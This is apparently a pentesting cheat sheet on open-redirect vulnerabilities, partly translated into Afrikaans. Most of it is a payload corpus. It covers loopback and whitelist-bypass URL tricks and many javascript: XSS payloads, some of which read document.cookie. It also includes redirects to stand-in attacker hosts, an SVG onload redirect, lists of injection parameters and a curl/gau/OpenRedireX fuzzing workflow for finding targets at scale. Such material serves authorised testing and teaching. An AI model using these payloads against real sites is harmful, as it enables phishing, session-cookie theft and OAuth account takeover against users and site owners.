Open Redirect

Reading time: 8 minutes

Open redirect

Redirect to localhost or arbitrary domains

• If the app “allows only internal/whitelisted hosts”, probeer alternatiewe host-notasies om loopback of interne reekse via die redirect-doel te bereik:
• IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
• IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
• Aanhangende punt en hooflettergebruik: localhost., LOCALHOST, 127.0.0.1.
• Wildcard DNS wat na loopback oplos: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Hierdie is nuttig wanneer slegs “subdomains of X” toegelaat word maar host-resolusie steeds na 127.0.0.1 wys.
• Netwerk-pad verwysings omseil dikwels naïewe validators wat 'n scheme voorvoeg of slegs voorvoegsels kontroleer:
• //attacker.tld → geïnterpreteer as scheme-relative en navigeer na 'n eksterne domein met die huidige scheme.
• Userinfo tricks omseil contains/startswith kontroles teen vertroude hosts:
• https://trusted.tld@attacker.tld/ → browser navigeer na attacker.tld maar eenvoudige stringkontroles “sien” trusted.tld.
• Backslash-parsing verwarring tussen frameworks/browsers:
• https://trusted.tld@attacker.tld → sommige backends behandel “\” as 'n pad-karakter en slaag validasie; browsers normaliseer na “/” en interpreteer trusted.tld as userinfo, wat gebruikers na attacker.tld stuur. Dit verskyn ook in Node/PHP URL-parser mismatches.

URL Format Bypass

Modern open-redirect to XSS pivots

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

# Scheme-relative (current scheme is reused)
//evil.example

# Credentials (userinfo) trick
https://trusted.example@evil.example/

# Backslash confusion (server validates, browser normalizes)
https://trusted.example\@evil.example/

# Schemeless with whitespace/control chars
evil.example%00
%09//evil.example

# Prefix/suffix matching flaws
https://trusted.example.evil.example/
https://evil.example/trusted.example

# When only path is accepted, try breaking absolute URL detection
/\\evil.example
/..//evil.example

Open Redirect oplaai van svg-lêers

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Algemene injeksieparameters

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Kodevoorbeelde

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://mysafedomain.com");

PHP

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Hunting and exploitation werkvloei (praktyies)

• Enkele URL-kontrole met curl:

curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"

• Ontdek en fuzz waarskynlike parameters op skaal:

# 1) Gather historical URLs, keep those with common redirect params
cat domains.txt \
| gau --o urls.txt            # or: waybackurls / katana / hakrawler

# 2) Grep common parameters and normalize list
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
| sed 's/\r$//' | sort -u > candidates.txt

# 3) Use OpenRedireX to fuzz with payload corpus
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt

# 4) Manually verify interesting hits
awk '/30[1237]|Location:/I' results.txt

• Moet nie client-side sinks in SPAs vergeet nie: soek window.location/assign/replace en framework helpers wat query/hash lees en redirect.

• Frameworks veroorsaak dikwels footguns wanneer redirect destinations afgelei word van onbetroubare invoer (query params, Referer, cookies). Sien Next.js notes oor redirects en vermy dinamiese bestemmings wat van gebruikersinvoer afgelei word.

NextJS

• OAuth/OIDC flows: misbruik van open redirectors lei dikwels tot account takeover deur authorization codes/tokens te leak. Sien toegewyde gids:

OAuth to Account takeover

• Server responses wat redirects implementeer sonder Location (meta refresh/JavaScript) bly uitbuitbaar vir phishing en kan soms gekoppel word. Grep for:

<meta http-equiv="refresh" content="0;url=//evil.example">
<script>location = new URLSearchParams(location.search).get('next')</script>

Gereedskap

• https://github.com/0xNanda/Oralyzer
• OpenRedireX – fuzzer vir die opsporing van open redirects. Voorbeeld:

# Install
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh

# Fuzz a list of candidate URLs (use FUZZ as placeholder)
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50

Verwysings

• Op https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect kan jy fuzzing-lyste vind.
• https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html
• https://github.com/cujanovic/Open-Redirect-Payloads
• https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a
• PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
• OpenRedireX – 'n fuzzer vir die opsporing van open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX